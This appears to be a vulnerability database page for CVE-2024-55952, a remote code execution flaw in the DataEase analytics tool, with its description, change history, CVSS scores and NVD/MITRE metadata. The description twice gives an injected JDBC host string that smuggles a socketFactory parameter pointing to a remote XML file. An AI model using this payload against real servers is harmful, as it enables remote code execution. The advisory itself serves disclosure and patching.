DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
History

Thu, 20 Feb 2025 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Dataease
Dataease dataease
Weaknesses NVD-CWE-noinfo
CPEs cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*
Vendors & Products Dataease
Dataease dataease
Metrics cvssV3_1

{'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}


Wed, 18 Dec 2024 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Wed, 18 Dec 2024 19:00:00 +0000

Type Values Removed Values Added
Description DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Title Dataease Redshift Data Source JDBC Connection Parameters Not Verified Leads to RCE Vulnerability
Weaknesses CWE-20
References
Metrics cvssV4_0

{'score': 8.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N'}


cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2024-12-18T18:49:24.214Z

Updated: 2024-12-18T19:16:19.747Z

Reserved: 2024-12-13T17:47:38.371Z

Link: CVE-2024-55952

cve-icon Vulnrichment

Updated: 2024-12-18T19:08:17.916Z

cve-icon NVD

Status : Analyzed

Published: 2024-12-18T19:15:11.933

Modified: 2025-02-20T16:22:50.240

Link: CVE-2024-55952

cve-icon Redhat

No data.